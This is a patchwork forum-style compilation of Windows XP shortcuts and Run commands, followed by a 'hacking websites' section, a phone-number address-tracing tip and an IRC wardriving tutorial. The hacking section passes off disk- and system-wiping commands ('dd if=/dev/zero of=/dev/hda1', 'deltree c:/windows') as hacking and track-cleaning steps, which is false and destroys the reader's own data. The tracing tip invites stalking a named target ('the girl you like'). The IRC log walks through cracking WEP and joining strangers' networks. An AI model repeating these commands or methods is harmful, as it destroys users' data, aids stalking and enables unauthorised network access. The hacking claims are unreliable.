    • Ctrl + Shift while dragging item(s): Create shortcut(s).
    • In tree pane, if any:
    • Left: Collapse the current selection if expanded, or select the parent folder.
    • Right: Expand the current selection if collapsed, or select the first subfolder.
    • NumpadAsterisk: Expand currently selected directory and all subdirectories. No undo.
    • NumpadPlus: Expand currently selected directory.
    • NumpadMinus: Collapse currently selected directory.


    5.) Accessibility




    • Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
    • Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
    • Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
    • NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
    • Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.

    6.) Microsoft Natural Keyboard with IntelliType Software Installed

    • Win + L: Log off Windows.
    • Win + P: Open Print Manager.
    • Win + C: Open control panel.
    • Win + V: Open clipboard.
    • Win + K: Open keyboard properties.
    • Win + I: Open mouse properties.
    • Win + A: Open Accessibility properties.
    • Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
    • Win + S: Toggle CapsLock on and off.


    7.) Remote Desktop Connection Navigation




    • Ctrl + Alt + End: Open the NT Security dialog.
    • Alt + PageUp: Switch between programs.
    • Alt + PageDown: Switch between programs in reverse.
    • Alt + Insert: Cycle through the programs in most recently used order.
    • Alt + Home: Display start menu.
    • Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
    • Alt + Delete: Display the Windows menu.
    • Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
    • Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.


    8.) Mozilla Firefox Shortcuts




    • Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
    • Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
    • Ctrl + (1-9): Switch to tab corresponding to number.
    • Ctrl + N: New window.
    • Ctrl + T: New tab.
    • Ctrl + L or Alt + D or F6: Switch focus to location bar.
    • Ctrl + Enter: Open location in new tab.
    • Shift + Enter: Open location in new window.
    • Ctrl + K or Ctrl + E: Switch focus to search bar.
    • Ctrl + O: Open a local file.
    • Ctrl + W: Close tab, or window if there's only one tab open.
    • Ctrl + Shift + W: Close window.
    • Ctrl + S: Save page as a local file.
    • Ctrl + P: Print page.
    • Ctrl + F or F3: Open find toolbar.
    • Ctrl + G or F3: Find next...
    • Ctrl + Shift + G or Shift + F3: Find previous...
    • Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
    • Ctrl + H: Open History sidebar.
    • Escape: Stop loading page.
    • Ctrl + R or F5: Reload current page.
    • Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
    • Ctrl + U: View page source.
    • Ctrl + D: Bookmark current page.
    • Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
    • Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
    • Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
    • Alt + Left or Backspace: Back.
    • Alt + Right or Shift + Backspace: Forward.
    • Alt + Home: Open home page.
    • Ctrl + M: Open new message in integrated mail client.
    • Ctrl + J: Open Downloads dialog.
    • F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
    • Shift + F6: Switch to previous frame.
    • Apostrophe ('): Find link as you type.
    • Slash (/): Find text as you type.


    9.) GMail




    • Note: Must have "keyboard shortcuts" on in settings.
    • C: Compose new message.
    • Shift + C: Open new window to compose new message.
    • Slash (/): Switch focus to search box.
    • K: Switch focus to the next most recent email. Enter or "O" opens focused email.
    • J: Switch focus to the next oldest email.
    • N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.
    • P: Switch focus to the previous message.
    • U: Takes you back to the inbox and checks for new mail.
    • Y: Various actions depending on current view:
    • Has no effect in "Sent" and "All Mail" views.
    • Inbox: Archive email or message.
    • Starred: Unstar email or message.
    • Spam: Unmark as spam and move back to "Inbox."
    • Trash: Move back to "Inbox."
    • Any label: Remove the label.
    • X: "Check" an email. Various actions can be performed against all checked emails.
    • S: "Star" an email. Identical to the more familiar term, "flagging."
    • R: Reply to the email.
    • A: Reply to all recipients of the email.
    • F: Forward an email.
    • Shift + R: Reply to the email in a new window.
    • Shift + A: Reply to all recipients of the email in a new window.
    • Shift + F: Forward an email in a new window.
    • Shift + 1 (!): Mark an email as spam and remove it from the inbox.
    • G then I: Switch to "Inbox" view.
    • G then S: Switch to "Starred" view.
    • G then A: Switch to "All Mail" view.
    • G then C: Switch to "Contacts" view.
    • G then D: Switch to "Drafts" view.



    10.) List of F1-F9 Key Commands for the Command Prompt




    • F1 / right arrow: Repeats the letters of the last command line, one by one.
    • F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line
    • F3: Repeats the last command line
    • F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line
    • F5: Goes back one command line
    • F6: Enters the traditional CTRL+Z (^z)
    • F7: Displays a menu with the command line history
    • F8: Cycles back through previous command lines (beginning with most recent)
    • F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
    • Alt + Enter: Toggle full screen mode.
    • Up/Down: Scroll through/repeat previous entries.
    • Esc: Delete line.

    $UM!T(Fainted brain)

    Full codes. Kindly add if you know more!



    Accessibility Controls - access.cpl
    Add Hardware Wizard - hdwwiz.cpl
    Add/Remove Programs - appwiz.cpl
    Administrative Tools - control admintools
    Automatic Updates - wuaucpl.cpl
    Bluetooth Transfer Wizard - fsquirt
    Calculator - calc
    Certificate Manager - certmgr.msc
    Character Map - charmap
    Check Disk Utility - chkdsk
    Clipboard Viewer - clipbrd
    Command Prompt - cmd
    Component Services - dcomcnfg
    Computer Management - compmgmt.msc
    Date and Time Properties - timedate.cpl
    DDE Shares - ddeshare
    Device Manager - devmgmt.msc
    Direct X Control Panel (if installed) - directx.cpl
    Direct X Troubleshooter - dxdiag
    Disk Cleanup Utility - cleanmgr
    Disk Defragment - dfrg.msc
    Disk Management - diskmgmt.msc
    Disk Partition Manager - diskpart
    Display Properties - control desktop
    Display Properties - desk.cpl
    Display Properties (w/Appearance Tab Preselected) - control color
    Dr. Watson System Troubleshooting Utility - drwtsn32
    Driver Verifier Utility - verifier
    Event Viewer - eventvwr.msc
    File Signature Verification Tool - sigverif
    Findfast - findfast.cpl
    Folders Properties - control folders
    Fonts - control fonts
    Fonts Folder - fonts
    Free Cell Card Game - freecell
    Game Controllers - joy.cpl
    Group Policy Editor (XP Prof) - gpedit.msc
    Hearts Card Game - mshearts
    Iexpress Wizard - iexpress
    Indexing Service - ciadv.msc
    Internet Properties - inetcpl.cpl
    IP Configuration (Display Connection Configuration) - ipconfig /all
    IP Configuration (Display DNS Cache Contents) - ipconfig /displaydns
    IP Configuration (Delete DNS Cache Contents) - ipconfig /flushdns
    IP Configuration (Release All Connections) - ipconfig /release
    IP Configuration (Renew All Connections) - ipconfig /renew
    IP Configuration (Refreshes DHCP & Re-Registers DNS) - ipconfig /registerdns
    IP Configuration (Display DHCP Class ID) - ipconfig /showclassid
    IP Configuration (Modifies DHCP Class ID) - ipconfig /setclassid
    Java Control Panel (if installed) - jpicpl32.cpl
    Java Control Panel (if installed) - javaws
    Keyboard Properties - control keyboard
    Local Security Settings - secpol.msc
    Local Users and Groups - lusrmgr.msc
    Logs You Out Of Windows - logoff
    Microsoft Chat - winchat
    Minesweeper Game - winmine
    Mouse Properties - control mouse
    Mouse Properties - main.cpl
    Network Connections - control netconnections
    Network Connections - ncpa.cpl
    Network Setup Wizard - netsetup.cpl
    Notepad - notepad
    Nview Desktop Manager (if installed) - nvtuicpl.cpl
    Object Packager - packager
    ODBC Data Source Administrator - odbccp32.cpl
    On Screen Keyboard - osk
    Opens AC3 Filter (if installed) - ac3filter.cpl
    Password Properties - password.cpl
    Performance Monitor - perfmon.msc
    Performance Monitor - perfmon
    Phone and Modem Options - telephon.cpl
    Power Configuration - powercfg.cpl
    Printers and Faxes - control printers
    Printers Folder - printers
    Private Character Editor - eudcedit
    Quicktime (if installed) - QuickTime.cpl
    Regional Settings - intl.cpl
    Registry Editor - regedit
    Registry Editor - regedt32
    Remote Desktop - mstsc
    Removable Storage - ntmsmgr.msc
    Removable Storage Operator Requests - ntmsoprq.msc
    Resultant Set of Policy (XP Prof) - rsop.msc
    Scanners and Cameras - sticpl.cpl
    Scheduled Tasks - control schedtasks
    Security Center - wscui.cpl
    Services - services.msc
    Shared Folders - fsmgmt.msc
    Shuts Down Windows - shutdown
    Sounds and Audio - mmsys.cpl
    Spider Solitaire Card Game - spider
    SQL Client Configuration - cliconfg
    System Configuration Editor - sysedit
    System Configuration Utility - msconfig
    System File Checker Utility (Scan Immediately) - sfc /scannow
    System File Checker Utility (Scan Once At Next Boot) - sfc /scanonce
    System File Checker Utility (Scan On Every Boot) - sfc /scanboot
    System File Checker Utility (Return to Default Setting) - sfc /revert
    System File Checker Utility (Purge File Cache) - sfc /purgecache
    System File Checker Utility (Set Cache Size to size x) - sfc /cachesize=x
    System Properties - sysdm.cpl
    Task Manager - taskmgr
    Telnet Client - telnet
    User Account Management - nusrmgr.cpl
    Utility Manager - utilman
    Windows Firewall - firewall.cpl
    Windows Magnifier - magnify
    Windows Management Infrastructure - wmimgmt.msc
    Windows System Security Tool - syskey
    Windows Update Launcher - wupdmgr
    Windows XP Tour Wizard - tourstart
    Wordpad - write

    Run line commands can be very useful sometimes; it's better to know them. Here are all the commands that I know; you might find them useful too. The commands are the same for Windows XP Pro and Home.

    Run Line Commands


    These are GUI applications that can be opened from the run line.
    These applications are not located in the C:\windows\system32\ directory, the
    keys for these applications are located in the registry under:
    HKLM\software\microsoft\windows\currentversion\app paths
    BCKGZM.EXE - Backgammon
    CHKRZM.EXE - Checkers
    CONF.EXE - NetMeeting
    DIALER.EXE - Phone Dialer
    HELPCTR.EXE - Help and Support
    HRTZZM.EXE - Internet Hearts
    HYPERTRM.EXE - HyperTerminal
    ICWCONN1.EXE - Internet Connection Wizard
    IEXPLORE.EXE - Internet Explorer
    INETWIZ.EXE - Setup Your Internet Connection
    INSTALL.EXE - User's Folder
    MIGWIZ.EXE - File and Settings Transfer Wizard
    MOVIEMK.EXE - Windows Movie Maker
    MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
    MSCONFIG.EXE - System Configuration Utility
    MSIMN.EXE - Outlook Express
    MSINFO32.EXE - System Information
    MSMSGS.EXE - Windows Messenger
    MSN6.EXE - MSN Explorer
    PBRUSH.EXE - Paint
    PINBALL.EXE - Pinball
    RVSEZM.EXE - Reversi
    SHVLZM.EXE - Spades
    TABLE30.EXE - User's Folder
    WAB.EXE - Windows Address Book
    WABMIG.EXE - Address Book Import Tool
    WINNT32.EXE - User's Folder
    WMPLAYER.EXE - Windows Media Player
    WRITE.EXE - Wordpad

    These .EXE files reside in (c:\windows\system32\) or (c:\windows\) directory.
    ACCWIZ.EXE - Accessibility Wizard
    CALC.EXE - Calculator
    CHARMAP.EXE - Character Map
    CLEANMGR.EXE - Disk Space Cleanup Manager
    CLICONFG.EXE - SQL Client Configuration Utility
    CLIPBRD.EXE - Clipbook Viewer
    CLSPACK.EXE - Class Package Export Tool
    CMD.EXE - Command Line
    CMSTP.EXE - Connection Manager Profile Installer
    CONTROL.EXE - Control Panel
    DCOMCNFG.EXE - Component Services
    DDESHARE.EXE - DDE Share
    DRWATSON.EXE - Doctor Watson v1.00b
    DRWTSN32.EXE - Doctor Watson Settings
    DVDPLAY.EXE - DVD Player
    DXDIAG.EXE - DirectX Diagnostics
    EUDCEDIT.EXE - Private Character Editor
    EVENTVWR.EXE - Event Viewer
    EXPLORER.EXE - Windows Explorer
    FREECELL.EXE - Free Cell
    FXSCLNT.EXE - Fax Console
    FXSCOVER.EXE - Fax Cover Page Editor
    FXSEND.EXE - MS Fax Send Note Utility
    IEXPRESS.EXE - IExpress 2.0
    LOGOFF.EXE - System Logoff
    MAGNIFY.EXE - Microsoft Magnifier
    MMC.EXE - Microsoft Management Console
    MOBSYNC.EXE - Microsoft Synchronization Manager
    MPLAY32.EXE - Windows Media Player version 5.1
    MSHEARTS.EXE - Hearts
    MSPAINT.EXE - Paint
    MSTSC.EXE - Remote Desktop Connection
    NARRATOR.EXE - Microsoft Narrator
    NETSETUP.EXE - Network Setup Wizard
    NOTEPAD.EXE - Notepad
    NSLOOKUP.EXE - NSLookup Application
    NTSD.EXE - Symbolic Debugger for Windows 2000
    ODBCAD32.EXE - ODBC Data Source Administrator
    OSK.EXE - On Screen Keyboard
    OSUNINST.EXE - Windows Uninstall Utility
    PACKAGER.EXE - Object Packager
    PERFMON.EXE - Performance Monitor
    PROGMAN.EXE - Program Manager
    RASPHONE.EXE - Remote Access Phonebook
    REGEDIT.EXE - Registry Editor
    REGEDT32.EXE - Registry Editor
    RESET.EXE - Resets Session
    RSTRUI.EXE - System Restore
    RTCSHARE.EXE - RTC Application Sharing
    SFC.EXE - System File Checker
    SHRPUBW.EXE - Create Shared Folder
    SHUTDOWN.EXE - System Shutdown
    SIGVERIF.EXE - File Signature Verification
    SNDREC32.EXE - Sound Recorder
    SNDVOL32.EXE - Sound Volume
    SOL.EXE - Solitaire

    SPIDER.EXE - Spider Solitaire
    SYNCAPP.EXE - Create A Briefcase
    SYSEDIT.EXE - System Configuration Editor
    SYSKEY.EXE - SAM Lock Tool
    TASKMGR.EXE - Task Manager
    TELNET.EXE - MS Telnet Client
    TSSHUTDN.EXE - System Shutdown
    TOURSTART.EXE - Windows Tour Launcher
    UTILMAN.EXE - System Utility Manager
    USERINIT.EXE - My Documents
    VERIFIER.EXE - Driver Verifier Manager
    WIAACMGR.EXE - Scanner and Camera Wizard
    WINCHAT.EXE - Windows for Workgroups Chat
    WINHELP.EXE - Windows Help Engine
    WINHLP32.EXE - Help
    WINMINE.EXE - Minesweeper
    WINVER.EXE - Windows Version Information
    WRITE.EXE - WordPad
    WSCRIPT.EXE - Windows Script Host Settings
    WUPDMGR.EXE - Windows Update

    The following are Control Panel applets that can be run from the run line.
    They are located in the c:\windows\system32 directory, and have the file type
    extension ".CPL".
    ACCESS.CPL - Accessibility Options
    APPWIZ.CPL - Add or Remove Programs
    DESK.CPL - Display Properties
    HDWWIZ.CPL - Add Hardware Wizard
    INETCPL.CPL - Internet Explorer Properties
    INTL.CPL - Regional and Language Options
    JOY.CPL - Game Controllers
    MAIN.CPL - Mouse Properties
    MMSYS.CPL - Sounds and Audio Device Properties
    NCPA.CPL - Network Connections
    NUSRMGR.CPL - User Accounts
    ODBCCP32.CPL - ODBC Data Source Administrator
    POWERCFG.CPL - Power Options Properties
    SYSDM.CPL - System Properties
    TELEPHON.CPL - Phone and Modem Options
    TIMEDATE.CPL - Date and Time Properties
    The following are Microsoft Management Console Snap-ins that can be opened from
    the run line. These applications have the file type extension ".MSC".
    CERTMGR.MSC - Certificates
    CIADV.MSC - Indexing Service
    COMPMGMT.MSC - Computer Management
    DEVMGMT.MSC - Device Manager
    DFRG.MSC - Disk Defragmenter
    DISKMGMT.MSC - Disk Management
    EVENTVWR.MSC - Event Viewer
    FSMGMT.MSC - Shared Folders
    LUSRMGR.MSC - Local Users and Groups
    NTMSMGR.MSC - Removable Storage
    NTMSOPRQ.MSC - Removable Storage Operator Requests
    PERFMON.MSC - Performance Monitor
    SERVICES.MSC - Services
    WMIMGMT.MSC - Windows Management Infrastructure




    Calculation on the Command Prompt! Did you know this???


    The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

    C:\>set /a 2+2
    4
    C:\>set /a 2*(9/2)
    8
    C:\>set /a (2*9)/2
    9
    C:\>set /a "31>>2"
    7

    Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.

    For more information, type set /? at the command prompt.


    ***************************************************************************

    Hey folks, do you know that Windows XP has a hidden "Star Wars Movie" inside it???
    You should be connected to the NET for using this.
    Go to Start-->Programs-->Run
    Type
    telnet towel.blinkenlights.nl
    And hit enter......... Enjoy the magic!!!!



    $UM!T ( Fainted brain)


    Wanna know the address of the girl you like, or the address of your friend? It is so easy to trace addresses; all you need is their phone number.

    EXAMPLE: For tracing the address of a number located in Madhya Pradesh (India) just log in to http://www.bsnl.co.in/onlinedirectory.htm

    After logging in, select the area (city) to which the phone number belongs and then proceed further.

    In the "Search by" option, select Telephone number. Select the station to which the phone number belongs and finally enter the phone number in the "Search key" field. In this way the address of that particular number will be traced.

    For selecting any other state of India, log on to http://www.bsnl.co.in/index.html . On the right-hand side you see the "BSNL units" option (above the Username field); select your state from the menu and then proceed further.

    NOTE : Try both, number including (2) as well as number excluding (2) as a prefix.

    Now on to SMS settings

    1>Service centre No:- +919863002222
    2>Validity period:- Maximum
    3>Message type:- Text
    4>Reply path:- Off
    5>Delivery report:- Off

    Note:- Your balance Must be Zero......

    Hello All,
    I've been trying to work this one out for some time, and the solution is actually pretty simple!

    To enable themes on Windows Server 2003 follow these steps:
    1) Go to the Services applet in Administrative Tools.

    2) Find the "Themes" service, right-click and select Properties, select "Automatic" instead of "Disabled" in the startup type box.

    3) Click Apply.

    4) Right-click the Themes service and select Start.

    5) Click OK.

    For now you only have Luna Blue, Silver and Olive Green to choose from:
    1) Go to Control Panel, select Display and then go to the Appearance tab.

    2) In the "Windows and Buttons" drop-down list select "Windows XP Style".

    3) Click OK.

    There you go, Windows XP themes on your server! I knew all the GFX that went into Helm Toolbox would be worth it.


    With a proper understanding of the relevant programming languages such as C, C++, Perl, Java etc., one can be fully equipped with the technique of hacking into websites. There are backdoors for the web hackers for website hacking. For hacking web sites, one of the best ways for the hacker is to install Linux on the personal computer he or she wants to hack from. Then he can open up a shell and type: dd if=/dev/zero of=/dev/hda1 and press ENTER. As the next step he will type: dd hf=(url). There are a few other alternatives for hacking sites as well. The web hackers using a Windows PC can also master the art of hacking websites with the flick of a finger.


    The first step is to clean up the tracks so that the feds fail to trace the hacker. This happens automatically in the case of Linux. Cleaning up tracks in the case of Windows 95, Windows 98 or Windows ME involves a step-by-step procedure: click Start, then Run, and then type Command. In the case of Windows NT or Windows 2000 the tracks can be cleaned by clicking Start, then Run, and then typing cmd. The next step is to clean up tracks with deltree c:/windows or c:\winnt, or whatever the main Windows directory is. At the command prompt, press y, which will then go through and clean up the system's logs. The hackers should perform the same steps again after hacking sites/hacking wireless internet sites. Then, after this cleaning up, the hackers should type: ping -l4000 (url).

    Cyber Terrorism And Hacker's Group

    The whole planet is today terrorized by the web hackers, to whom hacking seems a mode of getting pleasure by way of gaining knowledge or mere entertainment. A group of serious hackers named PENTAGUARD had cracked into the government sites of Australia, America and England all at one time. The hackers in this case had replaced the pages with a typical statement that read "The largest .gov & .mil mass defacement in the history of mankind".

    This was a simple statement with an aesthetic undertone of threat. The act affected almost 24 sites with a transitory disruption. Similarly, an educational site on mad cow disease was defaced, along with some city and national government sites in England. The Alaskan office of the Department of the Interior was once attacked since the Secretary of the Interior Designate, Gale Norton, encouraged drilling in the Arctic Wildlife Refuge to extract oil.

    The Commonwealth of Australia is no exception. The search page of the Commonwealth of Australia was once hacked, along with the websites of small municipalities in Australia. These are a scanty number of instances that proved to have jeopardized the respective concerns severely. The hackers had to use only simple techniques and methods to do these. Website hacking for these hackers is all as simple as child's play. Their main focus was on the sites that were designed with vulnerable loopholes.

    Searched By - $UM!T

    By blacksun.box.sk

    22:12:33 --> AZTEK (aztek@198.81.129.100) has joined #bsrf

    22:12:33 --- Topic for #bsrf is .::Welcome to Blacksun Research Facility [BSRF] ::. http://blacksun.box.sk Enjoy your stay and plz talk this channel feels dead (Mikkkeee) (AZTEK)

    22:12:33 --- Topic for #bsrf set by AZTEK at Sat Apr 27 14:05:07

    22:12:33 --- ChanServ sets mode +q

    22:12:33 --- ChanServ gives channel operator status to AZTEK

    22:12:48 But then, I have no idea what I'm talking about

    22:12:56 <-- mtcx1 has quit ( Ping timeout)

    22:13:00 lol

    22:13:19 ok im back

    22:13:20 well now logging works

    22:13:28 i am logging simprix

    22:13:33 ok

    22:13:59 anyone can butt in if they want or if i say something wrong

    22:13:59 ok

    22:14:22 everyone here

    22:14:34 ;]

    22:14:39 ya

    22:14:52 ok girls and boys

    22:15:43 Ok this will be centralized around linux because I have never done this in Windows and Windows sucks

    22:16:13 oki

    22:16:14 one thing i do know if you want to do this in windows then you need to use netstumbler

    22:16:32 or ApSniff

    22:16:47 from a website i am lookin at :/

    22:16:57 Ok first off in linux you need to recompile your kernel with netlink and get rid of pcmcia support in the kernel

    22:17:20 then you have to get the pcmcia source for pcmcia-cd.sourceforge.net

    22:17:47 there are two ways you can do it now

    22:18:16 you can use the wireless extensions in the kernel but you need a good card like a cisco aironet card

    22:18:52 but the wireless extensions does not have as good sniffing techniques as the linux-wlan source

    22:19:05 so the way i have done it is using the linux-wlan-ng source

    22:19:30 you can get that from www.linux-wlan.org and you need to compile that

    22:19:37 any questions so far?

    22:19:59 or is no one listening

    22:20:00 nope

    22:20:15 is there info on editing the kernel?

    22:20:48 have you recompiled a kernel before?

    22:20:49 miteymouse, wheres that site with ApSniff?

    22:21:04 no im new sorry :(

    22:21:12 strider: www.wardriving.com

    22:21:20 What he/she/it said^

    22:21:21 thnx

    22:21:25 ok well you should read the howto

    22:21:40 i plan on it :P

    22:21:54 ok once you have compiled all that stuff you're almost ready to get started

    22:22:23 Could you just explain what it is that those modifications do?

    22:22:40 Or is it too lengthy to explain now.

    22:22:50 oh yea the linux-wlan stuff only works with the prism2 chipset, which are cards like linksys, dlink, netgear, zoom a lot of consumer cards

    22:23:09 what modifications

    22:23:23 The recompilations

    22:23:36 they are pretty much drivers for the cards

    22:23:47 i prefer the zoom wireless cards

    22:23:53 Ah, ty

    22:24:17 ok does everyone in here know what snmp is

    22:24:59 any aussies here>?

    22:25:02 SNMP

    22:25:03 * Paranoiac does not....is a know-nothing-newb

    22:25:39 well the linux-wlan binaries are a lot like using snmp

    22:25:56 like to specify the ssid

    22:26:33 a ssid is kinda like a network id

    22:26:46 say one access point is on ssid: ap01

    22:27:00 and one access point is on ssid: ap02

    22:27:19 --- BaGeL[CS] is now known as BaGeL

    22:27:28 and you want to attach to ap01 then you would use the ssid of ap01

    22:27:45 it is to specify wireless networks

    22:27:48 everyone with me?

    22:27:53 and questions?

    22:28:12 SNMP - Simple Network Management Protocol

    22:28:21 ep

    22:28:22 yep

    22:28:37 Ah

    22:29:00 http://www.rad.com/networks/1995/snmp/snmp.htm

    22:29:12 Ty

    22:30:09 ok but if you are not familiar with snmp and using mibs, you could use a program my friend wrote called wlanfe you can get it from se.rious.net or freshmeat.net

    22:30:51 --> r (trashmail@172.166.185.154) has joined #bsrf

    22:31:00 ok now you are ready to go wardriving

    22:31:10 --> Sheik (sheik001@65.58.40.148) has joined #bsrf

    22:31:34 i am warning, make sure you are with someone else and make them drive

    22:31:49 Hehe

    22:31:58 it is really hard to drive and look at your computer at the same time trust me

    22:32:18 wtf?

    22:32:21 drive?

    22:32:26 and computer

    22:32:32 heh

    22:33:06 yes

    22:33:25 also you should get some programs before you go

    22:33:48 so you basically can just use someone else's wireless network?

    22:34:02 these programs are kismet, airsnort, scanchan, arpping

    22:34:06 yes miteymous

    22:34:10 like...hijack it...an invisible parasite?

    22:34:13 ok question

    22:34:19 yes

    22:34:51 <-- Sheik has quit (Quit: )

    22:34:53 would it be possible to set up your own wireless network, that hijacks your targets, and then spreads it farther via your equipment

    22:35:06 maybe letting you have free access at your house

    22:35:14 yes you could bridge the connection

    22:35:21 with a wireless bridge

    22:35:41 he networks would need to overlap, though

    22:35:45 *The

    22:35:52 would the same basic techniques work with cell phone modems

    22:36:34 well if you have the wireless bridge on the same ssid then your ok

    22:36:40 and they wont overlap

    22:36:53 miteymous: i dont know anything about cell phone modems

    22:37:16 well i mean they obviously work on different frequencies

    22:37:16 it might work but i dont know what cell phones use as their protocols

    22:37:39 well then you could use a frequency counter and use a ham radio

    22:37:44 <-- Forbze has quit (Ping timeout)

    22:37:51 hey is neve campbelle that girl in the movie three to tango?

    22:38:44 everyone ready to continue

    22:38:58 <-- r (trashmail@172.166.185.154) has left #bsrf

    22:39:06 go ahead :)

    22:39:29 yah

    22:39:31 :D

    22:39:55 --> Forbze (thedon@203.134.22.186) has joined #bsrf

    22:39:56 --- ChanServ gives channel operator status to Forbze

    22:40:08 ok well when you are ready to go you need to put your wireless card in promiscuous mode which means it will gather everything that is in the air

    22:40:35 there are tools that come with kismet

    22:40:36 <-- LiquidKn0wledge (LiquidKn0w@66.153.12.78) has left #bsrf

    22:40:56 ok after that is all set you will start up kismet

    22:41:15 and go drive around

    22:41:51 once something pops up on the screen there will be three sections

    22:42:02 nite all

    22:42:04 ssid: it will say the ssid here

    22:42:14 nite

    22:42:20 WEP: it will say if wep is being used

    22:42:32 channel it will say what channel the network is on

    22:42:48 does everyone know what WEP is

    22:43:00 no

    22:43:05 ditto

    22:43:19 wireless encryption protocol

    22:43:56 it encrypts the network

    22:44:17 so you cant attach to the network unless you have the wep key

    22:44:36 What kind of encryption is it?

    22:45:27 RC4

    22:45:43 <-- ro0t has quit (Quit: rm -rf /;reboot&)

    22:45:57 so you have to crack the encryption then, does kismet do that?

    22:46:04 no

    22:46:08 --> ro0t (ro0t@216.153.217.132) has joined #bsrf

    22:46:30 ok we will get to what you do if they use wep

    22:46:44 but first we will talk about a network with out wep

    22:47:19 while you are watching a kismet it will say what the ssid is remember that

    22:47:40 if it says under W: N, then they arent using wep

    22:48:03 ok so once you have got these

    22:48:32 you will need to pop out your card to take it out of promiscuous mode

    22:48:40 and pop it back in

    22:48:48 then you will open wlanfe

    22:49:11 and under ssid type the ssid you got from kismet

    22:49:16 and click apply

    22:49:25 now you are attached

    22:49:43 now you need to get a ip

    22:50:00 if the access point is using dhcp you can get it that way

    22:50:14 but if it isnt you need to find out what ips they are using

    22:50:24 to do this we will use arping

    22:51:08 run that and we will get some ips they are using

    22:51:23 so you will assign an unused ip using ifconfig

    22:51:43 and then it is just like you are on a normal network

    22:51:46 any questions?

    22:52:12 so at this point you are connected and have internet access?

    22:52:21 huh? is this thing still going??

    22:52:24 and access to their network?

    22:52:25 j/k

    22:52:29 Hehe

    22:52:34 yes

    22:52:39 what Strider are you bored

    22:52:50 whoah

    22:53:03 Are there many networks that are unsecured?

    22:53:09 yes

    22:53:12 lots

    22:53:18 Groovy

    22:53:28 the city hall in my town is not using wep

    22:53:40 Strider: what can we do to keep you interested

    22:53:53 me?

    22:53:55 ermm

    22:53:57 danece?

    22:54:01 dance*

    22:54:10 How can you secure yourself from being detected/accessed?

    22:54:12 ok so lets say you are connected now

    22:54:24 would you be able to see all the computers that are shared on the network?

    22:54:32 yes

    22:54:36 network neighborhood type thing?

    22:54:37 if you use samba

    22:54:43 sorry Strider

    22:54:53 Paranoiac: i will get to securing them later

    22:54:57 * miteymous does the chicken dance for Strider

    22:55:05 lmao

    22:55:07 Ahh, ok...thanks

    22:55:16 Bah....that's nothing

    22:55:20 wait i thought samba was used to show graphics

    22:55:25 * Paranoiac does the Funky Monkey

    22:55:35 when compiling programs etc

    22:55:48 nope

    22:55:54 what Strider

    22:56:10 ahhsoo o_O

    22:56:40 ok everyone ready

    22:56:46 to talk about wep

    22:57:01 yup

    22:57:07 Aye, cap'n

    22:57:17 go on then

    22:57:24 ok

    22:57:41 well out in california two kids figured out how to break wep

    22:58:31 hold on, whats wep?? is that still the wireless thingy?

    22:58:41 yes

    22:58:46 ah ok

    22:58:49 carry on

    22:58:51 wireless encryption protocol :x

    22:58:52 it is wireless encryption protocol

    22:59:32 ok when you find a wireless network you need to use airsnort

    23:00:11 with your card still in promiscuous mode you need to start airsnort and just start to gather packets

    23:00:19 --> GOD (que_import@226C75B7.CF2E741F.41F302F6.IP) has joined #bsrf

    23:00:47 usually with a 128 bit wep key you should gather 1 gig of traffic

    23:00:58 then it will list the wep key

    23:01:06 everyone with me so far

    23:01:25 So it grabs the key from the other user's packets?

    23:01:37 airsnort figures out the key for you?

    23:01:44 yes and beacon frames

    23:01:48 yes miteymous

    23:02:02 That's useful

    23:02:20 yes

    23:02:33 ok so once you have the wep key

    23:02:52 Is the WEP verification a constant activity then? As opposed to using it once, like a password....

    23:02:59 --> nosolution (NS@p19-tnt1.ham.ihug.co.nz) has joined #bsrf

    23:03:36 you will load up wlanfe and put the ssid you have and click on the wep key tab and type the key

    23:03:45 yes it is constant Paranoiac

    23:04:55 --> Jackel88 (new-web@166.90.65.247) has joined #bsrf

    23:05:10 ok so once you attach to the network you need to get your ip the same way you did before

    23:05:19 without wep

    23:06:28 <-- Jackel88 has quit (Quit: Leaving)

    23:06:29 ok there are three ways to secure a wireless network besides wep

    23:06:31 --- GOD is now known as satan

    23:06:34 kewl

    23:06:37 cause wep sucks

    23:06:43 <-- bluehaze[BED] has quit (Ping timeout)

    23:06:44 Hehe

    23:06:59 hey this is already registered

    23:07:46 ok the three ways are a radius server, a kerberos server, ipsec

    23:07:56 --- satan is now known as compaq

    23:08:36 if you need to know about those ways read the rfc's cause i am not going to explain them this time maybe another lecture

    23:09:07 suhweet

    23:09:11 ok im done any questions

    23:09:19 or opinions

    23:09:25 do you have to have a big antennae?

    23:09:30 no

    23:09:33 and how far away can you be

    23:09:35 --> Ravish (Ravish@210.214.102.213) has joined #bsrf

    23:09:48 500 feet is 2 megs a second

    23:09:57 * Strider is away (finger lickin the chicken)

    23:10:03 hmm

    23:10:04 <-- Forbze has quit (Quit: Vive La Revolution)

    23:10:06 thats not that far

    23:10:07 What kind of wireless is this?

    23:10:08 i would not go past 500 feet

    User's guide

    __________________________

    Well, howdy folks... I guess you are all wondering who's this guy (me)

    that's trying to show you a bit of everything... ?

